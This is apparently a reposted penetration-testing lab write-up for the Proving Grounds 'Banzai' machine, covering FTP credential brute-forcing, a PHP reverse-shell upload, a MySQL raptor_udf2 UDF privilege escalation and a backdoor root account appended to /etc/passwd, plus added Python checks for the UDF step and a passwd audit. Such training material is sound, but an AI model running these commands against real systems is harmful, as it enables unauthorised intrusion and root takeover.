Proving Grounds Practice-Banzai

admin | 2024-09-28 11:58:18 | 6 views | 19,164 characters | reading time 63 min 52 s

Preface

Write-ups for Proving Grounds Practice machines will keep being added here. I recently passed the OSCP exam, so I am sharing all of my practice notes. The machine list comes from this spreadsheet: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159
Some of those machines have since been retired from Proving Grounds Practice and therefore have no write-up; the series will cover roughly 40 machines in total. If you get stuck on one, dig into it yourself first and only then read the write-up. As always: Try Harder.

Structure of this article

Every write-up in this series follows the same layout:

  1. Port scanning
  2. Web or service enumeration
  3. Initial access
  4. Privilege escalation

Machine: Banzai | Difficulty: Intermediate

Port scanning

┌──(aaron㉿aacai)-[~/Desktop/Script/nmapAutomator]
└─$ sudo nmap -p21,22,25,5432,8080,8295 -A -Pn 192.168.241.56 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-11 06:52 +0330
Nmap scan report for 192.168.241.56
Host is up (0.26s latency).

PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 3.0.3
22/tcp   open  ssh        OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 ba:3f:68:15:28:86:36:49:7b:4a:84:22:68:15:cc:d1 (RSA)
|   256 2d:ec:3f:78:31:c3:d0:34:5e:3f:e7:6b:77:b5:61:09 (ECDSA)
|_  256 4f:61:5c:cc:b0:1f:be:b4:eb:8f:1c:89:71:04:f0:aa (ED25519)
25/tcp   open  smtp       Postfix smtpd
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after:  2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: banzai.offseclabs.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
5432/tcp open  postgresql PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.19
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after:  2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http       Apache httpd 2.4.25
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.25 (Debian)
8295/tcp open  http       Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Banzai

Service enumeration

PostgreSQL

┌──(aaron㉿aacai)-[~/Desktop/Script]
└─$ psql -U postgres -h 192.168.241.56 
psql: error: connection to server at "192.168.241.56", port 5432 failed: FATAL:  no pg_hba.conf entry for host "192.168.45.238", user "postgres", database "postgres", SSL on
connection to server at "192.168.241.56", port 5432 failed: FATAL:  no pg_hba.conf entry for host "192.168.45.238", user "postgres", database "postgres", SSL off

Both the SSL and the plaintext attempt are rejected at the host-based authentication stage: pg_hba.conf has no entry for the attacker's address, so no password is ever checked and brute-forcing PostgreSQL from outside is pointless. The port is still worth remembering in case a shell on the box later allows a local connection.

Port 8080

┌──(aaron㉿aacai)-[~/Desktop/Script]
└─$ feroxbuster --url "http://192.168.241.56:8080"                                 
[####################] - 4m     30000/30000   0s      found:0       errors:111    
[####################] - 4m     30000/30000   114/s   http://192.168.241.56:8080/    

Every request to 8080 gets 403 Forbidden (see the http-title in the nmap output), and directory brute-forcing finds nothing.

Port 8295

[~/Desktop/Script]
└─$ feroxbuster --url "http://192.168.241.56:8295" 
[####################] - 3m     30141/30141   0s      found:58      errors:9      
[####################] - 3m     30000/30000   163/s   http://192.168.241.56:8295/ 
[####################] - 1s     30000/30000   51903/s http://192.168.241.56:8295/css/ => Directory listing
[####################] - 6s     30000/30000   5087/s  http://192.168.241.56:8295/lib/ => Directory listing
[####################] - 6s     30000/30000   5338/s  http://192.168.241.56:8295/lib/easing/ => Directory listing
[####################] - 6s     30000/30000   5336/s  http://192.168.241.56:8295/lib/bootstrap/ => Directory listing
[####################] - 7s     30000/30000   4415/s  http://192.168.241.56:8295/lib/bootstrap/css/ => Directory listing
[####################] - 6s     30000/30000   5350/s  http://192.168.241.56:8295/contactform/ => Directory listing
[####################] - 1s     30000/30000   54645/s http://192.168.241.56:8295/lib/font-awesome/ => Directory listing
[####################] - 1s     30000/30000   54250/s http://192.168.241.56:8295/js/ => Directory listing
[####################] - 3s     30000/30000   9208/s  http://192.168.241.56:8295/lib/font-awesome/fonts/ => Directory listing
[####################] - 2s     30000/30000   17162/s http://192.168.241.56:8295/lib/font-awesome/css/ => Directory listing
[####################] - 4s     30000/30000   7296/s  http://192.168.241.56:8295/img/ => Directory listing
[####################] - 2s     30000/30000   19737/s http://192.168.241.56:8295/img/portfolio/ => Directory listing
[####################] - 1s     30000/30000   52448/s http://192.168.241.56:8295/lib/superfish/ => Directory listing
[####################] - 1s     30000/30000   35800/s http://192.168.241.56:8295/lib/animate/ => Directory listing
[####################] - 1s     30000/30000   26293/s http://192.168.241.56:8295/lib/bootstrap/js/ => Directory listing
[####################] - 1s     30000/30000   54446/s http://192.168.241.56:8295/lib/jquery/ => Directory listing
[####################] - 1s     30000/30000   53667/s http://192.168.241.56:8295/lib/wow/ => Directory listing
[####################] - 1s     30000/30000   53957/s http://192.168.241.56:8295/lib/waypoints/ => Directory listing
[####################] - 1s     30000/30000   54545/s http://192.168.241.56:8295/lib/counterup/ => Directory listing 

Directory enumeration on 8295 turns up only the static assets of the site template (css, js, lib, img and a contactform/ directory); there is no login page or other obvious entry point.

Port 21

Anonymous login is refused, so the next step is hydra with a default-credential list. -C takes a colon-separated login:password file, so each line is one pair to try (66 tries here) instead of a full user-by-password product:

[~/Desktop/Script]
└─$ hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.241.56 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-11 07:06:26
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://192.168.241.56:21/
[21][ftp] host: 192.168.241.56   login: admin   password: admin

admin:admin is a valid login.

Initial access

[~/Desktop/Script]
└─$ ftp 192.168.241.56                             
Connected to 192.168.241.56.
Name (192.168.241.56:aaron):admin
331 Please specify the password.
Password: 
230 Login successful.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> dir
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     0            4096 May 26  2020 contactform
drwxr-xr-x    2 1001     0            4096 May 26  2020 css
drwxr-xr-x    3 1001     0            4096 May 26  2020 img
-rw-r--r--    1 1001     0           23364 May 27  2020 index.php
drwxr-xr-x    2 1001     0            4096 May 26  2020 js
drwxr-xr-x   11 1001     0            4096 May 26  2020 lib
226 Directory send OK.

The admin account can log in to FTP, and the listing matches the site served on port 8295 (index.php, css, img, js, lib, contactform), so the FTP root is the web root. Because the site already executes index.php, a PHP file dropped into that tree will be run by Apache rather than served as a download, so the next step is to upload php-reverse-shell.php there.


┌──(aaron㉿aacai)-[~/Desktop/Script]
└─$ mousepad php-reverse-shell.php 

(for the pentestmonkey script this means setting $ip and $port to the attacker's address and listener port before uploading)

┌──(aaron㉿aacai)-[~/Desktop/Script]
└─$ ftp 192.168.241.56            
Connected to 192.168.241.56.
220 (vsFTPd 3.0.3)
Name (192.168.241.56:aaron): admin
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> cd img
250 Directory successfully changed.
ftp> put php-reverse-shell.php 
local: php-reverse-shell.php remote: php-reverse-shell.php
200 EPRT command successful. Consider using EPSV.
150 Ok to send data.
100% |******************************************************************|  5496       84.53 MiB/s    00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (10.61 KiB/s)
ftp> 

Once the file has been uploaded through FTP it is visible through the web server (the img/ directory listing on port 8295).

Requesting the PHP file fires the reverse shell back to the listener.

Privilege escalation

Enumeration (linpeas output)

═══════════════════════════════╣ Basic information ╠═══════════════════════════════
OS: Linux version 4.9.0-12-amd64 ([email protected]) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.210-1 (2020-01-20)
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: banzai
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)                                                                                                                 
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)  

══════════════════════════════╣ System Information ╠══════════════════════════════ 
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits                                                        
Linux version 4.9.0-12-amd64 ([email protected]) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.210-1 (2020-01-20)
Distributor ID: Debian
Description:    Debian GNU/Linux 9.12 (stretch)
Release:        9.12
Codename:       stretch

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version                                                           
Sudo version 1.8.19p1 

╔══════════╣ Users with console
banzai:x:1000:1000:Banzai,,,:/home/banzai:/bin/bash                                                                                       
postgres:x:111:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                    
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=1000(banzai) gid=1000(banzai) groups=1000(banzai),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
uid=1001(admin) gid=1001(admin) groups=1001(admin)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(Debian-exim) gid=109(Debian-exim) groups=109(Debian-exim)
uid=106(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=108(ftp) gid=113(ftp) groups=113(ftp)
uid=109(mysql) gid=114(mysql) groups=114(mysql)
uid=110(postfix) gid=115(postfix) groups=115(postfix)
uid=111(postgres) gid=117(postgres) groups=117(postgres),112(ssl-cert)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)


╔══════════╣ Useful software
/usr/bin/base64                                                                                                                           
/usr/bin/gcc
/bin/nc
/bin/nc.traditional
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget


╔══════════╣ MySQL version
mysql  Ver 14.14 Distrib 5.7.30, for Linux (x86_64) using  EditLine wrapper                                                               


═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No                                                                                
═╣ MySQL connection using root/NOPASS ................. No                                                                                
                                                                                                                                          
╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user=root                                                                           
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/


╔══════════╣ Analyzing PostgreSQL Files (limit 70)
Version: psql (PostgreSQL) 9.6.17                                                                                                         

-rw-r----- 1 postgres postgres 4641 Jun  5  2020 /etc/postgresql/9.6/main/pg_hba.conf

-rw-r--r-- 1 postgres postgres 22716 Jun  5  2020 /etc/postgresql/9.6/main/postgresql.conf
log_timezone = 'America/New_York'
stats_temp_directory = '/var/run/postgresql/9.6-main.pg_stat_tmp'
datestyle = 'iso, mdy'
timezone = 'America/New_York'
default_text_search_config = 'pg_catalog.english'
-rw-r--r-- 1 root root 176 Nov 12  2019 /usr/lib/tmpfiles.d/postgresql.conf
d /var/run/postgresql 2775 postgres postgres - -
d /var/log/postgresql 1775 root postgres - -

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
-rw-r--r--  1 admin root 23364 May 27  2020 index.php                                                                                     
-rw-r--r-- 1 admin root 135 May 26  2020 /var/www/config.php
drwxr-xr-x  2 admin root  4096 May 26  2020 contactform
drwxr-xr-x  2 admin root  4096 May 26  2020 css
drwxr-xr-x  2 admin root  4096 May 26  2020 js
drwxr-xr-x  3 admin root  4096 Aug 10 23:46 img
drwxr-xr-x 11 admin root  4096 May 26  2020 lib
total 44

config.php in /var/www is readable and holds the MySQL root password:

cat /var/www/config.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'EscalateRaftHubris123');
define('DBNAME', 'main');
?>

Logging in locally on the target with those credentials works.

www-data@banzai:/tmp$ mysql -uroot -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.7.30 MySQL Community Server (GPL)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 
mysql> exit
Bye

That is the MySQL root account, so the next thing to try is escalation through a user-defined function (UDF). Two conditions decide whether this yields root rather than just commands as the mysql user: mysqld itself has to run as root (otherwise do_system() executes as the service account), and secure_file_priv must not confine LOAD_FILE() and INTO DUMPFILE (check SHOW VARIABLES LIKE 'secure_file_priv'; and SHOW VARIABLES LIKE 'plugin_dir'; the dumpfile target has to be the plugin directory). Both hold on this box, which is what makes the chmod of /etc/passwd below work.

The source can be taken from Exploit-DB, raptor_udf2.c:

https://www.exploit-db.com/exploits/1518

or the older raptor_udf.c:

https://www.exploit-db.com/exploits/1181

First compile the C file on the target (the attacker serves it over HTTP on port 22, and gcc is present on the box):

www-data@banzai:/tmp$ wget 192.168.45.238:22/raptor_udf2.c
www-data@banzai:/tmp$ gcc -g -c raptor_udf2.c
www-data@banzai:/tmp$ ls
raptor_udf2.c  raptor_udf2.o
www-data@banzai:/tmp$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
www-data@banzai:/tmp$ ls
raptor_udf2.c  raptor_udf2.o  raptor_udf2.so

Then log in to MySQL and run the statements below. The path in LOAD_FILE() is wherever the .so was built (/tmp here), and the CREATE FUNCTION line is the step that actually registers the UDF:

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('chmod 777 /etc/passwd');

Running them in that order, however, fails at CREATE FUNCTION:

www-data@banzai:/tmp$ mysql -uroot -p
Welcome to the MySQL monitor. Commands end with ; or \g.
mysql> use mysql;
Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)

mysql> insert into foo values(load_file('/tmp/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
ERROR 1126 (HY000): Can't open shared library 'raptor_udf2.so' (errno: 11 /usr/lib/mysql/plugin/raptor_udf2.so: file too short)

The loader complains that the plugin file is too short. What actually happens is that LOAD_FILE() returns NULL instead of an error when mysqld cannot read the source file (unreadable permissions, a secure_file_priv restriction, or a /tmp the service does not see because it runs under systemd's PrivateTmp), and SELECT ... INTO DUMPFILE of that NULL row still reports success while writing a zero-byte raptor_udf2.so into the plugin directory. A cheap check before the dumpfile step is SELECT LENGTH(LOAD_FILE('/tmp/raptor_udf2.so')); which should return the file size rather than NULL. Two further caveats: INTO DUMPFILE refuses to overwrite an existing file, so if an empty raptor_udf2.so is already in the plugin directory the good copy has to be dumped under a different name (and referenced by that name in CREATE FUNCTION); and whatever path is used must be readable by the mysql OS user. Searching the error pointed at file permissions; chmod on the target did not help, so I compiled the library locally, uploaded it over FTP into the web root and set its mode there with SITE CHMOD, which worked.
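As an added example (not code from the original write-up or from raptor_udf2.c), the following Python checks the two things that go wrong above before touching MySQL: whether the file mysqld is going to load is really a non-empty x86-64 ELF shared object that its OS user can read, and the corrected order of SQL statements with the LENGTH(LOAD_FILE()) probe in front. The plugin directory, library name and do_system function name are the ones from the write-up; minimal_elf64_header() only builds a 64-byte header as a test fixture, not a loadable library, and the default command 'id' is a placeholder.

```python
"""Pre-flight checks for the raptor_udf2 MySQL UDF escalation.

Added example; not part of the original write-up or of raptor_udf2.c.
Assumptions: x86-64 Linux target, plugin_dir = /usr/lib/mysql/plugin and
the exported UDF is do_system (all taken from the write-up).
"""
import os
import struct
import tempfile

ELF_MAGIC = b"\x7fELF"
ELFCLASS64 = 2       # e_ident[EI_CLASS]
ELFDATA2LSB = 1      # e_ident[EI_DATA]
ET_DYN = 3           # e_type of a shared object
EM_X86_64 = 62       # e_machine for amd64


def diagnose_udf_library(path):
    """Return the reasons `path` would fail as a MySQL plugin ([] if none).

    A 0-byte file is the case behind "file too short": LOAD_FILE() returned
    NULL because mysqld could not read the source (permissions,
    secure_file_priv, or systemd PrivateTmp hiding /tmp) and
    SELECT ... INTO DUMPFILE still wrote that NULL as an empty plugin.
    """
    try:
        size = os.path.getsize(path)
    except OSError as exc:
        return ["cannot stat %s: %s" % (path, exc)]
    if size == 0:
        return ["%s is empty (0 bytes): LOAD_FILE() most likely returned NULL" % path]
    if size < 64:
        return ["%s is %d bytes, shorter than an ELF64 header" % (path, size)]

    with open(path, "rb") as fh:
        ident = fh.read(16)   # e_ident
        rest = fh.read(4)     # e_type, e_machine
    if ident[:4] != ELF_MAGIC:
        return ["%s is not an ELF file (magic %r)" % (path, ident[:4])]
    problems = []
    if ident[4] != ELFCLASS64:
        problems.append("not a 64-bit ELF (EI_CLASS=%d); 64-bit mysqld cannot dlopen it" % ident[4])
    if ident[5] != ELFDATA2LSB:
        problems.append("not little-endian (EI_DATA=%d)" % ident[5])
    endian = "<" if ident[5] == ELFDATA2LSB else ">"
    e_type, e_machine = struct.unpack(endian + "HH", rest)
    if e_type != ET_DYN:
        problems.append("e_type=%d is not ET_DYN; build with gcc -shared" % e_type)
    if e_machine != EM_X86_64:
        problems.append("e_machine=%d is not x86-64 (62); compiled for the wrong CPU" % e_machine)
    mode = os.stat(path).st_mode & 0o777
    if not mode & 0o004:
        problems.append("mode %o is not world-readable; mysqld's OS user cannot LOAD_FILE() it" % mode)
    return problems


def minimal_elf64_header(e_type=ET_DYN, e_machine=EM_X86_64):
    """64 bytes shaped like an ELF64 header. Test fixture only: not a
    loadable library, just enough for diagnose_udf_library() to parse."""
    ident = ELF_MAGIC + bytes([ELFCLASS64, ELFDATA2LSB, 1, 0]) + b"\0" * 8
    # e_type e_machine e_version e_entry e_phoff e_shoff e_flags e_ehsize
    # e_phentsize e_phnum e_shentsize e_shnum e_shstrndx
    return ident + struct.pack("<HHIQQQIHHHHHH", e_type, e_machine, 1, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0)


def write_fixture(name, payload, mode=0o644):
    """Write `payload` into a fresh temp directory and return its path."""
    path = os.path.join(tempfile.mkdtemp(), name)
    with open(path, "wb") as fh:
        fh.write(payload)
    os.chmod(path, mode)
    return path


def udf_sql_sequence(so_path, plugin_dir="/usr/lib/mysql/plugin", so_name="raptor_udf2.so", cmd="id"):
    """The write-up's statements in a working order, preceded by the checks
    that would have caught the empty-plugin problem. Paths are used verbatim,
    so keep them free of quotes."""
    return [
        "SHOW VARIABLES LIKE 'secure_file_priv';",    # must be '' (empty), not NULL or a directory
        "SHOW VARIABLES LIKE 'plugin_dir';",          # DUMPFILE target must be this directory
        "SELECT LENGTH(LOAD_FILE('%s'));" % so_path,  # NULL here means an empty plugin would be written
        "USE mysql;",
        "CREATE TABLE foo(line BLOB);",
        "INSERT INTO foo VALUES (LOAD_FILE('%s'));" % so_path,
        "SELECT * FROM foo INTO DUMPFILE '%s/%s';" % (plugin_dir, so_name),  # refuses to overwrite
        "CREATE FUNCTION do_system RETURNS INTEGER SONAME '%s';" % so_name,
        "SELECT * FROM mysql.func;",
        "SELECT do_system('%s');" % cmd,
    ]


if __name__ == "__main__":
    for name, payload in (("empty.so", b""), ("good.so", minimal_elf64_header()),
                          ("exe.so", minimal_elf64_header(e_type=2))):
        print(name, diagnose_udf_library(write_fixture(name, payload)) or "looks like a loadable x86-64 .so")
    print("\n".join(udf_sql_sequence("/var/www/html/raptor_udf2.so")))
```

Run diagnose_udf_library() against the copy of raptor_udf2.so that LOAD_FILE() will read, and again against the file that lands in the plugin directory; an empty second file is the exact failure the write-up hit. The header check only catches truncated or wrong-architecture builds, it does not prove the library exports do_system.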

[~/Desktop/Script/mysql]
└─$ gcc -g -c raptor_udf2.c                                                      
                                                                                                               
[~/Desktop/Script/mysql]
└─$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
                                                                                                               
[~/Desktop/Script/mysql]
└─$ ls
raptor_udf2.c  raptor_udf2.o  raptor_udf2.so
                                                                                                               
[~/Desktop/Script/mysql]
└─$ ftp 192.168.241.56
Connected to 192.168.241.56.

ftp> user admin
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> put raptor_udf2.so
local: raptor_udf2.so remote: raptor_udf2.so
200 EPRT command successful. Consider using EPSV.
150 Ok to send data.
ftp> chmod 777 raptor_udf2.so
200 SITE CHMOD command ok.
ftp> exit
221 Goodbye.

Retry the UDF escalation. Re-triggering the PHP shell gives a fresh session (listener on port 22 again):

[~/Desktop/pg/banzai]
└─$ sudo nc -lvnp 22
listening on [any] 22 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.241.56] 58692

www-data@banzai:/var/www/html$ ls
ls
contactform  css  img  index.php  js  lib  raptor_udf2.so
www-data@banzai:/var/www/html$ pwd
pwd
/var/www/html

The .so now sits in /var/www/html, so connect to MySQL again and point LOAD_FILE() at that path:

mysql> use mysql;
use mysql;
Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.02 sec)

mysql> insert into foo values(load_file('/var/www/html/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
Query OK, 1 row affected (0.01 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('chmod 777 /etc/passwd');
+------------------------------------+
| do_system('chmod 777 /etc/passwd') |
+------------------------------------+
|                                  0 |
+------------------------------------+


With /etc/passwd now world-writable, append a second UID 0 user with a known password hash and switch to it. openssl passwd with no algorithm option produces a traditional 13-character DES crypt hash, which glibc still accepts (openssl passwd -6 gives SHA-512 if DES is refused):

www-data@banzai:/var/www/html$ openssl passwd aaron
iNw1w7ZwlvoYw
www-data@banzai:/var/www/html$ echo "aaron2:iNw1w7ZwlvoYw:0:0::/root/:/bin/bash" >> /etc/passwd
www-data@banzai:/var/www/html$ su aaron2
Password: aaron
root@banzai:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@banzai:/var/www/html# cat /root/proof.txt
ed9406a4dce49f83e3d61e476c75c8f2
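For the defensive side of that last step, here is an added example (not from the original post) that audits an /etc/passwd file for exactly the two changes made above: a mode that lets non-root users write the file, and a second UID 0 account carrying its own password hash. SAMPLE_PASSWD is constructed to mirror the target's accounts; the home directories and shells of the daemon, www-data, mysql, banzai and admin entries are assumed, while the aaron2 line and its hash are the ones from the write-up.

```python
"""Audit /etc/passwd for the persistence left by the escalation above:
a file writable by non-root users and an extra UID 0 account with an
in-line password hash. Added example, not from the original write-up.
"""
import stat

# Constructed sample modelled on the target. The aaron2 line and hash are
# the ones from the write-up; the other entries' home/shell are assumed.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:109:114:MySQL Server,,,:/nonexistent:/bin/false
banzai:x:1000:1000:Banzai,,,:/home/banzai:/bin/bash
admin:x:1001:1001::/home/admin:/bin/sh
aaron2:iNw1w7ZwlvoYw:0:0::/root/:/bin/bash
"""


def audit_passwd(text, mode=0o644):
    """Return findings for a passwd file's content plus its permission bits."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("/etc/passwd mode %o is writable by group/others; anyone can add accounts" % (mode & 0o777))
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append("line %d: malformed entry with %d fields" % (lineno, len(fields)))
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        # Any UID 0 entry other than root is a backdoor until proven otherwise.
        if uid == "0" and name != "root":
            findings.append("line %d: extra UID 0 account %s (home %s, shell %s)" % (lineno, name, home, shell))
        # Hashes belong in /etc/shadow; 'x', '*', '' and '!...' are the normal markers.
        if pw not in ("x", "*", "") and not pw.startswith("!"):
            kind = "legacy DES crypt" if len(pw) == 13 and not pw.startswith("$") else "hash"
            findings.append("line %d: %s stored in /etc/passwd for %s instead of /etc/shadow" % (lineno, kind, name))
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD, mode=0o777):   # mode after chmod 777
        print(finding)
```

On a live host feed it the file contents and os.stat('/etc/passwd').st_mode; the three findings it raises on the sample are the chmod, the aaron2 account and its DES hash, which is the whole footprint of the technique.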

END

OSCP (Offensive Security Certified Professional) is a 200-level certification from Offensive Security aimed at penetration testing.
It is a hands-on technical certification covering penetration testing and attack techniques: holders have passed a practical exam in which they compromise a target network and obtain administrative access. The exam covers network penetration testing, vulnerability discovery and exploitation. It is considered difficult and demands real skills and experience, so the certificate demonstrates practical, in-depth ability in penetration testing and related attack techniques.

If you found this article useful, please follow and share; thanks for the support :)

Contact

WeChat ID: wengchensmile
Email: [email protected] (personal)

Originally published on the WeChat official account "Aaron与安全的那些事": Proving Grounds Practice-Banzai

Page URL (CN-SEC中文网 repost, posted by admin 2024-09-28 11:58:18): https://cn-sec.com/archives/1993768.html